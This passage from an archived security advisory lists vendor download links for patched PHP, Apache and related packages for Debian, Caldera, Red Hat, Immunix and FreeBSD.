        http://security.debian.org/dists/potato/updates/main/binary-i386/php4-mysql_4.0.3-0potato1_i386.deb
        http://security.debian.org/dists/potato/updates/main/binary-i386/php4-pgsql_4.0.3-0potato1_i386.deb
        http://security.debian.org/dists/potato/updates/main/binary-i386/php4-snmp_4.0.3-0potato1_i386.deb
        http://security.debian.org/dists/potato/updates/main/binary-i386/php4-xml_4.0.3-0potato1_i386.deb
        http://security.debian.org/dists/potato/updates/main/binary-i386/php4_4.0.3-0potato1_i386.deb
        http://security.debian.org/dists/potato/updates/main/binary-m68k/php4-cgi-gd_4.0.3-0potato1_m68k.deb
        http://security.debian.org/dists/potato/updates/main/binary-m68k/php4-cgi-imap_4.0.3-0potato1_m68k.deb
        http://security.debian.org/dists/potato/updates/main/binary-m68k/php4-cgi-ldap_4.0.3-0potato1_m68k.deb
        http://security.debian.org/dists/potato/updates/main/binary-m68k/php4-cgi-mhash_4.0.3-0potato1_m68k.deb
        http://security.debian.org/dists/potato/updates/main/binary-m68k/php4-cgi-mysql_4.0.3-0potato1_m68k.deb
        http://security.debian.org/dists/potato/updates/main/binary-m68k/php4-cgi-pgsql_4.0.3-0potato1_m68k.deb
        http://security.debian.org/dists/potato/updates/main/binary-m68k/php4-cgi-snmp_4.0.3-0potato1_m68k.deb
        http://security.debian.org/dists/potato/updates/main/binary-m68k/php4-cgi-xml_4.0.3-0potato1_m68k.deb
        http://security.debian.org/dists/potato/updates/main/binary-m68k/php4-cgi_4.0.3-0potato1_m68k.deb
        http://security.debian.org/dists/potato/updates/main/binary-m68k/php4-gd_4.0.3-0potato1_m68k.deb
        http://security.debian.org/dists/potato/updates/main/binary-m68k/php4-imap_4.0.3-0potato1_m68k.deb
        http://security.debian.org/dists/potato/updates/main/binary-m68k/php4-ldap_4.0.3-0potato1_m68k.deb
        http://security.debian.org/dists/potato/updates/main/binary-m68k/php4-mhash_4.0.3-0potato1_m68k.deb
        http://security.debian.org/dists/potato/updates/main/binary-m68k/php4-mysql_4.0.3-0potato1_m68k.deb
        http://security.debian.org/dists/potato/updates/main/binary-m68k/php4-pgsql_4.0.3-0potato1_m68k.deb
        http://security.debian.org/dists/potato/updates/main/binary-m68k/php4-snmp_4.0.3-0potato1_m68k.deb
        http://security.debian.org/dists/potato/updates/main/binary-m68k/php4-xml_4.0.3-0potato1_m68k.deb
        http://security.debian.org/dists/potato/updates/main/binary-m68k/php4_4.0.3-0potato1_m68k.deb
        http://security.debian.org/dists/potato/updates/main/binary-powerpc/php4-cgi-gd_4.0.3-0potato1_powerpc.deb
        http://security.debian.org/dists/potato/updates/main/binary-powerpc/php4-cgi-imap_4.0.3-0potato1_powerpc.deb
        http://security.debian.org/dists/potato/updates/main/binary-powerpc/php4-cgi-ldap_4.0.3-0potato1_powerpc.deb
        http://security.debian.org/dists/potato/updates/main/binary-powerpc/php4-cgi-mhash_4.0.3-0potato1_powerpc.deb
        http://security.debian.org/dists/potato/updates/main/binary-powerpc/php4-cgi-mysql_4.0.3-0potato1_powerpc.deb
        http://security.debian.org/dists/potato/updates/main/binary-powerpc/php4-cgi-pgsql_4.0.3-0potato1_powerpc.deb
        http://security.debian.org/dists/potato/updates/main/binary-powerpc/php4-cgi-snmp_4.0.3-0potato1_powerpc.deb
        http://security.debian.org/dists/potato/updates/main/binary-powerpc/php4-cgi-xml_4.0.3-0potato1_powerpc.deb
        http://security.debian.org/dists/potato/updates/main/binary-powerpc/php4-cgi_4.0.3-0potato1_powerpc.deb
        http://security.debian.org/dists/potato/updates/main/binary-powerpc/php4-gd_4.0.3-0potato1_powerpc.deb
        http://security.debian.org/dists/potato/updates/main/binary-powerpc/php4-imap_4.0.3-0potato1_powerpc.deb
        http://security.debian.org/dists/potato/updates/main/binary-powerpc/php4-ldap_4.0.3-0potato1_powerpc.deb
        http://security.debian.org/dists/potato/updates/main/binary-powerpc/php4-mhash_4.0.3-0potato1_powerpc.deb
        http://security.debian.org/dists/potato/updates/main/binary-powerpc/php4-mysql_4.0.3-0potato1_powerpc.deb
        http://security.debian.org/dists/potato/updates/main/binary-powerpc/php4-pgsql_4.0.3-0potato1_powerpc.deb
        http://security.debian.org/dists/potato/updates/main/binary-powerpc/php4-snmp_4.0.3-0potato1_powerpc.deb
        http://security.debian.org/dists/potato/updates/main/binary-powerpc/php4-xml_4.0.3-0potato1_powerpc.deb
        http://security.debian.org/dists/potato/updates/main/binary-powerpc/php4_4.0.3-0potato1_powerpc.deb
        http://security.debian.org/dists/potato/updates/main/binary-sparc/php4-cgi-gd_4.0.3-0potato1_sparc.deb
        http://security.debian.org/dists/potato/updates/main/binary-sparc/php4-cgi-imap_4.0.3-0potato1_sparc.deb
        http://security.debian.org/dists/potato/updates/main/binary-sparc/php4-cgi-ldap_4.0.3-0potato1_sparc.deb
        http://security.debian.org/dists/potato/updates/main/binary-sparc/php4-cgi-mhash_4.0.3-0potato1_sparc.deb
        http://security.debian.org/dists/potato/updates/main/binary-sparc/php4-cgi-mysql_4.0.3-0potato1_sparc.deb
        http://security.debian.org/dists/potato/updates/main/binary-sparc/php4-cgi-pgsql_4.0.3-0potato1_sparc.deb
        http://security.debian.org/dists/potato/updates/main/binary-sparc/php4-cgi-snmp_4.0.3-0potato1_sparc.deb
        http://security.debian.org/dists/potato/updates/main/binary-sparc/php4-cgi-xml_4.0.3-0potato1_sparc.deb
        http://security.debian.org/dists/potato/updates/main/binary-sparc/php4-cgi_4.0.3-0potato1_sparc.deb
        http://security.debian.org/dists/potato/updates/main/binary-sparc/php4-gd_4.0.3-0potato1_sparc.deb
        http://security.debian.org/dists/potato/updates/main/binary-sparc/php4-imap_4.0.3-0potato1_sparc.deb
        http://security.debian.org/dists/potato/updates/main/binary-sparc/php4-ldap_4.0.3-0potato1_sparc.deb
        http://security.debian.org/dists/potato/updates/main/binary-sparc/php4-mhash_4.0.3-0potato1_sparc.deb
        http://security.debian.org/dists/potato/updates/main/binary-sparc/php4-mysql_4.0.3-0potato1_sparc.deb
        http://security.debian.org/dists/potato/updates/main/binary-sparc/php4-pgsql_4.0.3-0potato1_sparc.deb
        http://security.debian.org/dists/potato/updates/main/binary-sparc/php4-snmp_4.0.3-0potato1_sparc.deb
        http://security.debian.org/dists/potato/updates/main/binary-sparc/php4-xml_4.0.3-0potato1_sparc.deb
        http://security.debian.org/dists/potato/updates/main/binary-sparc/php4_4.0.3-0potato1_sparc.deb

    For Caldera Systems:

        ftp://ftp.calderasystems.com/pub/updates/eServer/2.3/current/RPMS/
        ftp://ftp.calderasystems.com/pub/updates/eServer/2.3/current/SRPMS
           RPMS/mod_php3-3.0.17-1S.i386.rpm
           RPMS/mod_php3-doc-3.0.17-1S.i386.rpm
           SRPMS/mod_php3-3.0.17-1S.src.rpm

        ftp://ftp.calderasystems.com/pub/updates/eDesktop/2.4/current/RPMS/
        ftp://ftp.calderasystems.com/pub/updates/eDesktop/2.4/current/SRPMS
           RPMS/mod_php3-3.0.17-1D.i386.rpm
           RPMS/mod_php3-doc-3.0.17-1D.i386.rpm
           SRPMS/mod_php3-3.0.17-1D.src.rpm

    For RedHat:

        ftp://updates.redhat.com/5.2/alpha/apache-1.3.14-2.5.x.alpha.rpm
        ftp://updates.redhat.com/5.2/alpha/apache-devel-1.3.14-2.5.x.alpha.rpm
        ftp://updates.redhat.com/5.2/alpha/mod_perl-1.19-2.alpha.rpm
        ftp://updates.redhat.com/5.2/alpha/php-3.0.17-1.5.x.alpha.rpm
        ftp://updates.redhat.com/5.2/alpha/php-manual-3.0.17-1.5.x.alpha.rpm
        ftp://updates.redhat.com/5.2/alpha/php-pgsql-3.0.17-1.5.x.alpha.rpm
        ftp://updates.redhat.com/5.2/sparc/apache-1.3.14-2.5.x.sparc.rpm
        ftp://updates.redhat.com/5.2/sparc/apache-devel-1.3.14-2.5.x.sparc.rpm
        ftp://updates.redhat.com/5.2/sparc/mod_perl-1.19-2.sparc.rpm
        ftp://updates.redhat.com/5.2/sparc/php-3.0.17-1.5.x.sparc.rpm
        ftp://updates.redhat.com/5.2/sparc/php-manual-3.0.17-1.5.x.sparc.rpm
        ftp://updates.redhat.com/5.2/sparc/php-pgsql-3.0.17-1.5.x.sparc.rpm
        ftp://updates.redhat.com/5.2/i386/apache-1.3.14-2.5.x.i386.rpm
        ftp://updates.redhat.com/5.2/i386/apache-devel-1.3.14-2.5.x.i386.rpm
        ftp://updates.redhat.com/5.2/i386/mod_perl-1.19-2.i386.rpm
        ftp://updates.redhat.com/5.2/i386/php-3.0.17-1.5.x.i386.rpm
        ftp://updates.redhat.com/5.2/i386/php-manual-3.0.17-1.5.x.i386.rpm
        ftp://updates.redhat.com/5.2/i386/php-pgsql-3.0.17-1.5.x.i386.rpm
        ftp://updates.redhat.com/5.2/SRPMS/apache-1.3.14-2.5.x.src.rpm
        ftp://updates.redhat.com/5.2/SRPMS/mod_perl-1.19-2.src.rpm
        ftp://updates.redhat.com/5.2/SRPMS/php-3.0.17-1.5.x.src.rpm
        ftp://updates.redhat.com/6.2/alpha/apache-1.3.14-2.6.2.alpha.rpm
        ftp://updates.redhat.com/6.2/alpha/apache-devel-1.3.14-2.6.2.alpha.rpm
        ftp://updates.redhat.com/6.2/alpha/apache-manual-1.3.14-2.6.2.alpha.rpm
        ftp://updates.redhat.com/6.2/alpha/mod_perl-1.23-3.alpha.rpm
        ftp://updates.redhat.com/6.2/alpha/php-3.0.17-1.6.0.alpha.rpm
        ftp://updates.redhat.com/6.2/alpha/php-imap-3.0.17-1.6.0.alpha.rpm
        ftp://updates.redhat.com/6.2/alpha/php-manual-3.0.17-1.6.0.alpha.rpm
        ftp://updates.redhat.com/6.2/sparc/apache-1.3.14-2.6.2.sparc.rpm
        ftp://updates.redhat.com/6.2/sparc/apache-devel-1.3.14-2.6.2.sparc.rpm
        ftp://updates.redhat.com/6.2/sparc/apache-manual-1.3.14-2.6.2.sparc.rpm
        ftp://updates.redhat.com/6.2/sparc/mod_perl-1.23-3.sparc.rpm
        ftp://updates.redhat.com/6.2/sparc/php-3.0.17-1.6.0.sparc.rpm
        ftp://updates.redhat.com/6.2/sparc/php-imap-3.0.17-1.6.0.sparc.rpm
        ftp://updates.redhat.com/6.2/sparc/php-manual-3.0.17-1.6.0.sparc.rpm
        ftp://updates.redhat.com/6.2/sparc/php-pgsql-3.0.17-1.6.0.sparc.rpm
        ftp://updates.redhat.com/6.2/i386/apache-1.3.14-2.6.2.i386.rpm
        ftp://updates.redhat.com/6.2/i386/apache-devel-1.3.14-2.6.2.i386.rpm
        ftp://updates.redhat.com/6.2/i386/apache-manual-1.3.14-2.6.2.i386.rpm
        ftp://updates.redhat.com/6.2/i386/mod_perl-1.23-3.i386.rpm
        ftp://updates.redhat.com/6.2/i386/php-3.0.17-1.6.0.i386.rpm
        ftp://updates.redhat.com/6.2/i386/php-imap-3.0.17-1.6.0.i386.rpm
        ftp://updates.redhat.com/6.2/i386/php-manual-3.0.17-1.6.0.i386.rpm
        ftp://updates.redhat.com/6.2/i386/php-pgsql-3.0.17-1.6.0.i386.rpm
        ftp://updates.redhat.com/6.2/SRPMS/apache-1.3.14-2.6.2.src.rpm
        ftp://updates.redhat.com/6.2/SRPMS/mod_perl-1.23-3.src.rpm
        ftp://updates.redhat.com/6.2/SRPMS/php-3.0.17-1.6.0.src.rpm
        ftp://updates.redhat.com/6.2/alpha/apache-1.3.14-2.6.2.alpha.rpm
        ftp://updates.redhat.com/6.2/alpha/apache-devel-1.3.14-2.6.2.alpha.rpm
        ftp://updates.redhat.com/6.2/alpha/apache-manual-1.3.14-2.6.2.alpha.rpm
        ftp://updates.redhat.com/6.2/alpha/auth_ldap-1.4.0-3.alpha.rpm
        ftp://updates.redhat.com/6.2/alpha/mod_perl-1.23-3.alpha.rpm
        ftp://updates.redhat.com/6.2/alpha/php-3.0.17-1.6.1.alpha.rpm
        ftp://updates.redhat.com/6.2/alpha/php-imap-3.0.17-1.6.1.alpha.rpm
        ftp://updates.redhat.com/6.2/alpha/php-ldap-3.0.17-1.6.1.alpha.rpm
        ftp://updates.redhat.com/6.2/alpha/php-manual-3.0.17-1.6.1.alpha.rpm
        ftp://updates.redhat.com/6.2/alpha/php-pgsql-3.0.17-1.6.1.alpha.rpm
        ftp://updates.redhat.com/6.2/sparc/apache-1.3.14-2.6.2.sparc.rpm
        ftp://updates.redhat.com/6.2/sparc/apache-devel-1.3.14-2.6.2.sparc.rpm
        ftp://updates.redhat.com/6.2/sparc/apache-manual-1.3.14-2.6.2.sparc.rpm
        ftp://updates.redhat.com/6.2/sparc/auth_ldap-1.4.0-3.sparc.rpm
        ftp://updates.redhat.com/6.2/sparc/mod_perl-1.23-3.sparc.rpm
        ftp://updates.redhat.com/6.2/sparc/php-3.0.17-1.6.1.sparc.rpm
        ftp://updates.redhat.com/6.2/sparc/php-imap-3.0.17-1.6.1.sparc.rpm
        ftp://updates.redhat.com/6.2/sparc/php-ldap-3.0.17-1.6.1.sparc.rpm
        ftp://updates.redhat.com/6.2/sparc/php-manual-3.0.17-1.6.1.sparc.rpm
        ftp://updates.redhat.com/6.2/sparc/php-pgsql-3.0.17-1.6.1.sparc.rpm
        ftp://updates.redhat.com/6.2/i386/apache-1.3.14-2.6.2.i386.rpm
        ftp://updates.redhat.com/6.2/i386/apache-devel-1.3.14-2.6.2.i386.rpm
        ftp://updates.redhat.com/6.2/i386/apache-manual-1.3.14-2.6.2.i386.rpm
        ftp://updates.redhat.com/6.2/i386/auth_ldap-1.4.0-3.i386.rpm
        ftp://updates.redhat.com/6.2/i386/mod_perl-1.23-3.i386.rpm
        ftp://updates.redhat.com/6.2/i386/php-3.0.17-1.6.1.i386.rpm
        ftp://updates.redhat.com/6.2/i386/php-imap-3.0.17-1.6.1.i386.rpm
        ftp://updates.redhat.com/6.2/i386/php-ldap-3.0.17-1.6.1.i386.rpm
        ftp://updates.redhat.com/6.2/i386/php-manual-3.0.17-1.6.1.i386.rpm
        ftp://updates.redhat.com/6.2/i386/php-pgsql-3.0.17-1.6.1.i386.rpm
        ftp://updates.redhat.com/6.2/SRPMS/apache-1.3.14-2.6.2.src.rpm
        ftp://updates.redhat.com/6.2/SRPMS/auth_ldap-1.4.0-3.src.rpm
        ftp://updates.redhat.com/6.2/SRPMS/mod_perl-1.23-3.src.rpm
        ftp://updates.redhat.com/6.2/SRPMS/php-3.0.17-1.6.1.src.rpm
        ftp://updates.redhat.com/6.2/alpha/apache-1.3.14-2.6.2.alpha.rpm
        ftp://updates.redhat.com/6.2/alpha/apache-devel-1.3.14-2.6.2.alpha.rpm
        ftp://updates.redhat.com/6.2/alpha/apache-manual-1.3.14-2.6.2.alpha.rpm
        ftp://updates.redhat.com/6.2/alpha/auth_ldap-1.4.0-3.alpha.rpm
        ftp://updates.redhat.com/6.2/alpha/mod_perl-1.23-3.alpha.rpm
        ftp://updates.redhat.com/6.2/alpha/php-3.0.17-1.6.2.alpha.rpm
        ftp://updates.redhat.com/6.2/alpha/php-imap-3.0.17-1.6.2.alpha.rpm
        ftp://updates.redhat.com/6.2/alpha/php-ldap-3.0.17-1.6.2.alpha.rpm
        ftp://updates.redhat.com/6.2/alpha/php-manual-3.0.17-1.6.2.alpha.rpm
        ftp://updates.redhat.com/6.2/alpha/php-pgsql-3.0.17-1.6.2.alpha.rpm
        ftp://updates.redhat.com/6.2/sparc/apache-1.3.14-2.6.2.sparc.rpm
        ftp://updates.redhat.com/6.2/sparc/apache-devel-1.3.14-2.6.2.sparc.rpm
        ftp://updates.redhat.com/6.2/sparc/apache-manual-1.3.14-2.6.2.sparc.rpm
        ftp://updates.redhat.com/6.2/sparc/auth_ldap-1.4.0-3.sparc.rpm
        ftp://updates.redhat.com/6.2/sparc/mod_perl-1.23-3.sparc.rpm
        ftp://updates.redhat.com/6.2/sparc/php-3.0.17-1.6.2.sparc.rpm
        ftp://updates.redhat.com/6.2/sparc/php-imap-3.0.17-1.6.2.sparc.rpm
        ftp://updates.redhat.com/6.2/sparc/php-ldap-3.0.17-1.6.2.sparc.rpm
        ftp://updates.redhat.com/6.2/sparc/php-manual-3.0.17-1.6.2.sparc.rpm
        ftp://updates.redhat.com/6.2/sparc/php-pgsql-3.0.17-1.6.2.sparc.rpm
        ftp://updates.redhat.com/6.2/i386/apache-1.3.14-2.6.2.i386.rpm
        ftp://updates.redhat.com/6.2/i386/apache-devel-1.3.14-2.6.2.i386.rpm
        ftp://updates.redhat.com/6.2/i386/apache-manual-1.3.14-2.6.2.i386.rpm
        ftp://updates.redhat.com/6.2/i386/auth_ldap-1.4.0-3.i386.rpm
        ftp://updates.redhat.com/6.2/i386/mod_perl-1.23-3.i386.rpm
        ftp://updates.redhat.com/6.2/i386/php-3.0.17-1.6.2.i386.rpm
        ftp://updates.redhat.com/6.2/i386/php-imap-3.0.17-1.6.2.i386.rpm
        ftp://updates.redhat.com/6.2/i386/php-ldap-3.0.17-1.6.2.i386.rpm
        ftp://updates.redhat.com/6.2/i386/php-manual-3.0.17-1.6.2.i386.rpm
        ftp://updates.redhat.com/6.2/i386/php-pgsql-3.0.17-1.6.2.i386.rpm
        ftp://updates.redhat.com/6.2/SRPMS/apache-1.3.14-2.6.2.src.rpm
        ftp://updates.redhat.com/6.2/SRPMS/auth_ldap-1.4.0-3.src.rpm
        ftp://updates.redhat.com/6.2/SRPMS/mod_perl-1.23-3.src.rpm
        ftp://updates.redhat.com/6.2/SRPMS/php-3.0.17-1.6.2.src.rpm
        ftp://updates.redhat.com/7.0/i386/apache-1.3.14-3.i386.rpm
        ftp://updates.redhat.com/7.0/i386/apache-devel-1.3.14-3.i386.rpm
        ftp://updates.redhat.com/7.0/i386/apache-manual-1.3.14-3.i386.rpm
        ftp://updates.redhat.com/7.0/i386/mod_ssl-2.7.1-3.i386.rpm
        ftp://updates.redhat.com/7.0/i386/mod_php-4.0.3pl1-1.i386.rpm
        ftp://updates.redhat.com/7.0/i386/php-4.0.3pl1-1.i386.rpm
        ftp://updates.redhat.com/7.0/i386/php-imap-4.0.3pl1-1.i386.rpm
        ftp://updates.redhat.com/7.0/i386/php-ldap-4.0.3pl1-1.i386.rpm
        ftp://updates.redhat.com/7.0/i386/php-manual-4.0.3pl1-1.i386.rpm
        ftp://updates.redhat.com/7.0/i386/php-mysql-4.0.3pl1-1.i386.rpm
        ftp://updates.redhat.com/7.0/i386/php-pgsql-4.0.3pl1-1.i386.rpm
        ftp://updates.redhat.com/7.0/SRPMS/apache-1.3.14-3.src.rpm
        ftp://updates.redhat.com/7.0/SRPMS/php-4.0.3pl1-1.src.rpm

    Immunix has  released the  following packages  for Immunix  OS 6.2
    (StackGuarded versions of the RedHat packages):

        http://www.immunix.org:8080/ImmunixOS/6.2/updates/RPMS/apache-1.3.14-2.6.2_StackGuard.i386.rpm
        http://www.immunix.org:8080/ImmunixOS/6.2/updates/RPMS/apache-devel-1.3.14-2.6.2_StackGuard.i386.rpm
        http://www.immunix.org:8080/ImmunixOS/6.2/updates/RPMS/apache-manual-1.3.14-2.6.2_StackGuard.i386.rpm
        http://www.immunix.org:8080/ImmunixOS/6.2/updates/RPMS/auth_ldap-1.4.0-3_StackGuard.i386.rpm
        http://www.immunix.org:8080/ImmunixOS/6.2/updates/RPMS/mod_perl-1.23-3_StackGuard.i386.rpm
        http://www.immunix.org:8080/ImmunixOS/6.2/updates/RPMS/php-3.0.17-1.6.2_StackGuard.i386.rpm
        http://www.immunix.org:8080/ImmunixOS/6.2/updates/RPMS/php-imap-3.0.17-1.6.2_StackGuard.i386.rpm
        http://www.immunix.org:8080/ImmunixOS/6.2/updates/RPMS/php-ldap-3.0.17-1.6.2_StackGuard.i386.rpm
        http://www.immunix.org:8080/ImmunixOS/6.2/updates/RPMS/php-manual-3.0.17-1.6.2_StackGuard.i386.rpm
        http://www.immunix.org:8080/ImmunixOS/6.2/updates/RPMS/php-pgsql-3.0.17-1.6.2_StackGuard.i386.rpm
        http://www.immunix.org:8080/ImmunixOS/6.2/updates/SRPMS/apache-1.3.14-2.6.2_StackGuard.src.rpm
        http://www.immunix.org:8080/ImmunixOS/6.2/updates/SRPMS/auth_ldap-1.4.0-3_StackGuard.src.rpm
        http://www.immunix.org:8080/ImmunixOS/6.2/updates/SRPMS/mod_perl-1.23-3_StackGuard.src.rpm
        http://www.immunix.org:8080/ImmunixOS/6.2/updates/SRPMS/php-3.0.17-1.6.2_StackGuard.src.rpm

    For FreeBSD:

        [php3]
        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/www/mod_php-3.0.17.tgz
        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/www/mod_php-3.0.17.tgz
        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/www/mod_php-3.0.17.tgz
        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/www/mod_php-3.0.17.tgz
        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/www/mod_php-3.0.17.tgz
        [php4]
        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/www/mod_php-4.0.3pl1.tgz
        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/www/mod_php-4.0.3pl1.tgz
        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/www/mod_php-4.0.3pl1.tgz
        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/www/mod_php-4.0.3pl1.tgz
        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/www/mod_php-4.0.3pl1.tgz


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH